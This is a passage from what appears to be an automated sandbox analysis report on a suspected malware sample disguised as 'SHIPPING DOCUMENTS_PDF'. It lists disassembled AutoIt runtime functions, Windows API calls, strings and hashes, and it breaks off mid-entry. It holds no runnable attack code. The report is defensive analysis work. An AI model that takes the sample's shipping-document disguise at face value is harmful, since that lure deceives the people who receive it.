                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                    • String ID: AutoIt v3 GUI
                                                                                    • API String ID: 1458621304-248962490
                                                                                    • Opcode ID: d464a7d33a80c7978e682b2e881be16627dada6a2f3c46a33f6e9b976b34dff0
                                                                                    • Instruction ID: 807b9f7c9a2338729aa9c130df3b4d45543dba7fc3d0a42d4a1f8e909117c6d3
                                                                                    • Opcode Fuzzy Hash: d464a7d33a80c7978e682b2e881be16627dada6a2f3c46a33f6e9b976b34dff0
                                                                                    • Instruction Fuzzy Hash: 63B16C71A0120ADFDB14EFA8DC95BED7BF4FB49311F1081A9FA16A72A0DB749841CB50
                                                                                    Function 00BD3DE2 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00BD3E6F
                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BD3F2F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                    • API String ID: 3974292440-719923060
                                                                                    • Opcode ID: 9826559f9e0aa058eea24698fbff1afc2cb44c56db477c01d60d5c04504be929
                                                                                    • Instruction ID: 195282bdae794f611ed6319e4b90d169bfe658ac5dee7c53d0bf444266478498
                                                                                    • Opcode Fuzzy Hash: 9826559f9e0aa058eea24698fbff1afc2cb44c56db477c01d60d5c04504be929
                                                                                    • Instruction Fuzzy Hash: 08A17C706143019FCB14EF20C892B6AB7E5EF55714F1488EAB8669B3D2EB30ED09CB51
                                                                                    Function 00BAA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00BAA47A
                                                                                    • __swprintf.LIBCMT ref: 00BAA51B
                                                                                    • _wcscmp.LIBCMT ref: 00BAA52E
                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00BAA583
                                                                                    • _wcscmp.LIBCMT ref: 00BAA5BF
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00BAA5F6
                                                                                    • GetDlgCtrlID.USER32(?), ref: 00BAA648
                                                                                    • GetWindowRect.USER32(?,?), ref: 00BAA67E
                                                                                    • GetParent.USER32(?), ref: 00BAA69C
                                                                                    • ScreenToClient.USER32(00000000), ref: 00BAA6A3
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00BAA71D
                                                                                    • _wcscmp.LIBCMT ref: 00BAA731
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00BAA757
                                                                                    • _wcscmp.LIBCMT ref: 00BAA76B
                                                                                      • Part of subcall function 00B7362C: _iswctype.LIBCMT ref: 00B73634
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                    • String ID: %s%u
                                                                                    • API String ID: 3744389584-679674701
                                                                                    • Opcode ID: e96ad5c969725ef6fd3f0235059abd23257ad7c59668cb32cc68c90cda0fd35d
                                                                                    • Instruction ID: 801f85abfc449bc1c3fe46684ff50a5597f6806648d01d98cd35a45f72c1b10a
                                                                                    • Opcode Fuzzy Hash: e96ad5c969725ef6fd3f0235059abd23257ad7c59668cb32cc68c90cda0fd35d
                                                                                    • Instruction Fuzzy Hash: 36A1B171208706AFDB15DF64C884BAAF7E8FF45314F00856AF999D2190DB30ED55CBA2
                                                                                    Function 00BAAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00BAAF18
                                                                                    • _wcscmp.LIBCMT ref: 00BAAF29
                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00BAAF51
                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00BAAF6E
                                                                                    • _wcscmp.LIBCMT ref: 00BAAF8C
                                                                                    • _wcsstr.LIBCMT ref: 00BAAF9D
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00BAAFD5
                                                                                    • _wcscmp.LIBCMT ref: 00BAAFE5
                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00BAB00C
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00BAB055
                                                                                    • _wcscmp.LIBCMT ref: 00BAB065
                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00BAB08D
                                                                                    • GetWindowRect.USER32(00000004,?), ref: 00BAB0F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                    • String ID: @$ThumbnailClass
                                                                                    • API String ID: 1788623398-1539354611
                                                                                    • Opcode ID: a737ca5bf20c7f5b1e8c2ec8e03d5876b7f4d64a9a4f46bc0f8f98855a738ff7
                                                                                    • Instruction ID: 9dccfa126dd549d34dd74e0bbb285fa6f413af5d459801c5fd2202a8b33528f3
                                                                                    • Opcode Fuzzy Hash: a737ca5bf20c7f5b1e8c2ec8e03d5876b7f4d64a9a4f46bc0f8f98855a738ff7
                                                                                    • Instruction Fuzzy Hash: CD81B07110C2069FDB15DF10C881FAABBE8EF45714F0484EAFD999A092EB34DD89CB61
                                                                                    Function 00BAABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                    • API String ID: 1038674560-1810252412
                                                                                    • Opcode ID: ad97e92fd524f73cbe217255e60500701c6bd85379f01b0b0f3f82589802f3e4
                                                                                    • Instruction ID: ac64a3d0f356a9190a0e4b0efee890ee15e6f65d07596f9b7f0bbc12e1f18b1d
                                                                                    • Opcode Fuzzy Hash: ad97e92fd524f73cbe217255e60500701c6bd85379f01b0b0f3f82589802f3e4
                                                                                    • Instruction Fuzzy Hash: 8D317231B4C209AADA18FB50DE53FAE77E8DB11B21F2005E9B856710D1FF516F08D662
                                                                                    Function 00BC4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00BC5013
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00BC501E
                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00BC5029
                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00BC5034
                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00BC503F
                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00BC504A
                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00BC5055
                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00BC5060
                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00BC506B
                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00BC5076
                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00BC5081
                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00BC508C
                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00BC5097
                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00BC50A2
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00BC50AD
                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00BC50B8
                                                                                    • GetCursorInfo.USER32(?), ref: 00BC50C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$Load$Info
                                                                                    • String ID:
                                                                                    • API String ID: 2577412497-0
                                                                                    • Opcode ID: ddcaf1cf5ce3062ab4695065f6c95c1c83b374d2dd5ebd8bf15257bf9626b15c
                                                                                    • Instruction ID: 6db2ca095b6768acc542fa88487ca5a28ad0943e043decabe727b121577d9007
                                                                                    • Opcode Fuzzy Hash: ddcaf1cf5ce3062ab4695065f6c95c1c83b374d2dd5ebd8bf15257bf9626b15c
                                                                                    • Instruction Fuzzy Hash: 6131F4B1D4831A6ADF209FB68C89D6FBFE8FF04750F50456AA50DE7280DA786540CF91
                                                                                    Function 00BDA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BDA259
                                                                                    • DestroyWindow.USER32(?,?), ref: 00BDA2D3
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BDA34D
                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BDA36F
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BDA382
                                                                                    • DestroyWindow.USER32(00000000), ref: 00BDA3A4
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B50000,00000000), ref: 00BDA3DB
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BDA3F4
                                                                                    • GetDesktopWindow.USER32 ref: 00BDA40D
                                                                                    • GetWindowRect.USER32(00000000), ref: 00BDA414
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BDA42C
                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BDA444
                                                                                      • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                    • String ID: 0$tooltips_class32
                                                                                    • API String ID: 1297703922-3619404913
                                                                                    • Opcode ID: 891c7466b156d5dee7b78dfd46489d34dfb5cf5a3de6ebd7643af8cc640422d5
                                                                                    • Instruction ID: 1d9a22c4184d89284d63ee358727484512a5e7cd9c47efdd0b653584138e15dc
                                                                                    • Opcode Fuzzy Hash: 891c7466b156d5dee7b78dfd46489d34dfb5cf5a3de6ebd7643af8cc640422d5
                                                                                    • Instruction Fuzzy Hash: AB719070144206AFD725CF18CC59FAAB7E9FB89300F04456EF985873A1EBB4E906CB52
                                                                                    Function 00BDC5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00BDC627
                                                                                      • Part of subcall function 00BDAB37: ClientToScreen.USER32(?,?), ref: 00BDAB60
                                                                                      • Part of subcall function 00BDAB37: GetWindowRect.USER32(?,?), ref: 00BDABD6
                                                                                      • Part of subcall function 00BDAB37: PtInRect.USER32(?,?,00BDC014), ref: 00BDABE6
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00BDC690
                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BDC69B
                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BDC6BE
                                                                                    • _wcscat.LIBCMT ref: 00BDC6EE
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BDC705
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00BDC71E
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00BDC735
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00BDC757
                                                                                    • DragFinish.SHELL32(?), ref: 00BDC75E
                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00BDC851
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                    • API String ID: 169749273-3440237614
                                                                                    • Opcode ID: 0735ad26802d35070febb4ddba602bea8548de241874249f95de6f1696b9224e
                                                                                    • Instruction ID: 968dd062ef46fc255852b41928ddc9391b34680786a4e587bffaa44d6794cb34
                                                                                    • Opcode Fuzzy Hash: 0735ad26802d35070febb4ddba602bea8548de241874249f95de6f1696b9224e
                                                                                    • Instruction Fuzzy Hash: 1D617D71508301AFC701DF64DC95EAFBBE8EF89310F00496EF595972A1EB309A49CB52
                                                                                    Function 00BD4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00BD4424
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD446F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                    • API String ID: 3974292440-4258414348
                                                                                    • Opcode ID: b397b8ca41c5c84b651470f64178714594b43e6714e42217e3b6a97d1f0194c6
                                                                                    • Instruction ID: 49448f248c2aadb034b4836a6324bff21b9bc9610f99dbe560281e6a3b4c5dcd
                                                                                    • Opcode Fuzzy Hash: b397b8ca41c5c84b651470f64178714594b43e6714e42217e3b6a97d1f0194c6
                                                                                    • Instruction Fuzzy Hash: F5915D746047019FCB04EF10C852A6EB7E1EF95754F0488EAF8965B3A2DB30ED49CB81
                                                                                    Function 00BDB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00BDB8B4
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00BD91C2), ref: 00BDB910
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BDB949
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00BDB98C
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00BDB9C3
                                                                                    • FreeLibrary.KERNEL32(?), ref: 00BDB9CF
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BDB9DF
                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00BD91C2), ref: 00BDB9EE
                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00BDBA0B
                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00BDBA17
                                                                                      • Part of subcall function 00B72EFD: __wcsicmp_l.LIBCMT ref: 00B72F86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                    • String ID: .dll$.exe$.icl
                                                                                    • API String ID: 1212759294-1154884017
                                                                                    • Opcode ID: 3f8a58bba4c87d562627194a13f69d392e08cc290a3a76527006714ab2d24531
                                                                                    • Instruction ID: df61ef2f7aee538b5d68982084b2f1be7b8057792ae7e829c82956c8e67315df
                                                                                    • Opcode Fuzzy Hash: 3f8a58bba4c87d562627194a13f69d392e08cc290a3a76527006714ab2d24531
                                                                                    • Instruction Fuzzy Hash: DF61DF71900219FAEB14DF64CC51FBEBBE8EB08721F108596F915D62C1EB749A80DBA0
                                                                                    Function 00BBDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocalTime.KERNEL32(?), ref: 00BBDCDC
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BBDCEC
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BBDCF8
                                                                                    • __wsplitpath.LIBCMT ref: 00BBDD56
                                                                                    • _wcscat.LIBCMT ref: 00BBDD6E
                                                                                    • _wcscat.LIBCMT ref: 00BBDD80
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BBDD95
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDDA9
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDDDB
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBDDFC
                                                                                    • _wcscpy.LIBCMT ref: 00BBDE08
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00BBDE47
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                    • String ID: *.*
                                                                                    • API String ID: 3566783562-438819550
                                                                                    • Opcode ID: f7dcc18c08366e51e1f1770027fc305a8e267c62122d8e384dfa582e5ef3d156
                                                                                    • Instruction ID: 994fb4ebb69cabf2d0d4394de1bfff886d1c3850f09f126f8f377717f2dcaf56
                                                                                    • Opcode Fuzzy Hash: f7dcc18c08366e51e1f1770027fc305a8e267c62122d8e384dfa582e5ef3d156
                                                                                    • Instruction Fuzzy Hash: A3616E725042059FCB10EF20C844AEEB7E8FF89314F0489AEF99997251EB75E945CB52
                                                                                    Function 00BB9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00BB9C7F
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00BB9CA0
                                                                                    • __swprintf.LIBCMT ref: 00BB9CF9
                                                                                    • __swprintf.LIBCMT ref: 00BB9D12
                                                                                    • _wprintf.LIBCMT ref: 00BB9DB9
                                                                                    • _wprintf.LIBCMT ref: 00BB9DD7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 311963372-3080491070
                                                                                    • Opcode ID: 4ea14e2d648fe717d069d269136df1d522fe6dfa734fa79ea6cf48bd0abb54bf
                                                                                    • Instruction ID: b800b345b3904368c4d390d13f0b8a16e5dfa948eb5e84552253f39aa4f9cc7c
